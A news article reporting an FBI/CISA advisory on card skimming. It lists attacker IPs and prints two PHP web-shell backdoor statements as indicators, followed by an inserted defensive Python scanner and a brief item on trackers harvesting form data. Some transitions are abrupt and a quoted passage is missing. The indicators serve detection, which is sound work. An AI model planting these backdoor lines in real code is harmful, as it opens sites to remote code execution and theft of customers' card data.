The FBI and friends have warned companies against scammers harvesting users’ credit card information from forged payment pages on compromised websites.
It’s an age-old problem: someone breaks into your online store and changes the code so that when your customers enter their information, copies of their data are siphoned off to be used by fraudsters. Federal authorities this week detailed one such effort that has been popping up lately.
As early as September 2020, we are told, criminals compromised at least one US company’s vulnerable website from three IP addresses: 80[.]249.207.19, 80[.]82.64.211 and 80[.]249.206.197. The intruders modified the TempOrders.php web script to attempt to inject malicious code into the checkout.php page.
In a review [PDF] from the FBI and CISA and Uncle Sam’s Homeland Security, from January 2022 code was injected into the payment page to retrieve payment details from customers and send it all to a server controlled by scammers posing as a legitimate card processing system.
As the FBI explained:
Additionally, the crooks modified files on the server of the infiltrated website to install two backdoors. One of these backdoors was a standard web shell – a page that executes commands on the remote system – which was deployed including the statement assert($_REQUEST['login']) in a PHP page. This statement was exploited by visiting the spoofed page with the login URL parameter set to the code that fetched and installed the web shell.

Miscreants also slipped code – @preg_replace("/f/e",$_GET['u'],"fengjiao") – which appears to process a regular expression, and can be exploited to execute code provided in a URL parameter. These two code modifications were used to infiltrate the PHP PAS and b374 web shells on the victim’s server for other nefarious purposes.
You might want to check that the strings above are not present in your site’s PHP source code and that the IP addresses above do not appear in your web server logs. The FBI also recommends several measures to make your systems a less easy target for criminals.
These include regular software patches and updates, changing default login credentials, segmenting network systems to prevent lateral movement, monitoring traffic in your e-commerce environment to identify potential malicious activity and active analysis of web and application logs to detect unauthorized access and abnormal behavior.
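The two checks suggested above (grepping PHP source for the injected statements and the access logs for the listed IPs) as a small scanner. This is an added example, not code from the advisory; the file paths, log format (common/combined, client IP first) and sample inputs are constructed assumptions.

```python
import re

# Client IPs named in the advisory, with the defanged [.] written as real dots.
SUSPECT_IPS = {"80.249.207.19", "80.82.64.211", "80.249.206.197"}

# Source-code indicators from the advisory: assert() fed straight from a request
# superglobal, and preg_replace() whose pattern carries the /e modifier, which
# evaluates the replacement string as PHP code. Both are heuristics: a delimiter
# other than '/' would not match, and a hit still needs a human look.
CODE_PATTERNS = {
    "assert_on_request": re.compile(r"assert\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b"),
    "preg_replace_e_modifier": re.compile(
        r"""preg_replace\s*\(\s*(['"])/[^'"]*?/[a-zA-Z]*e[a-zA-Z]*\1"""),
}

def scan_php_source(path: str, source: str) -> list[tuple[str, int, str]]:
    """Return (path, line number, indicator name) for each suspicious line."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in CODE_PATTERNS.items():
            if pattern.search(line):
                hits.append((path, lineno, name))
    return hits

def scan_access_log(lines) -> list[tuple[str, str]]:
    """Return (ip, raw line) for each entry whose client IP is on the suspect list."""
    hits = []
    for line in lines:
        ip = line.split(" ", 1)[0]  # assumes client IP is the first field
        if ip in SUSPECT_IPS:
            hits.append((ip, line.rstrip()))
    return hits

# Constructed sample: a checkout page carrying both injected statements next to a
# harmless preg_replace() that must not trigger the /e check.
SAMPLE_PHP = """<?php
$orders = load_orders();
assert($_REQUEST['login']);
$name = @preg_replace("/f/e",$_GET['u'],"fengjiao");
$clean = preg_replace("/\\s+/", " ", $name);
"""

# Constructed sample log lines; 203.0.113.7 is a documentation address (benign).
SAMPLE_LOG = [
    '80.249.207.19 - - [12/Sep/2020:10:15:02 +0000] "POST /TempOrders.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Sep/2020:10:16:44 +0000] "GET /checkout.php HTTP/1.1" 200 4096',
    '80.82.64.211 - - [13/Sep/2020:03:01:19 +0000] "GET /checkout.php HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for hit in scan_php_source("checkout.php", SAMPLE_PHP) + scan_access_log(SAMPLE_LOG):
        print(hit)
```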
Of course, criminals aren’t the only ones with a penchant for scraping data.
According to the researchers, tracking, marketing and analytics companies exfiltrated the email addresses – and sometimes passwords – of web users from web forms before they were submitted and without the user’s consent.
In a paper due to appear at the Usenix ’22 security conference later this year, authors Asuman Senol (imec-COSIC, KU Leuven), Gunes Acar (Radboud University), Mathias Humbert (University of Lausanne) and Frederik Zuiderveen Borgesius (Radboud University) described how they measured data handling in web forms on the top 100,000 websites, as ranked by research site Tranco. ®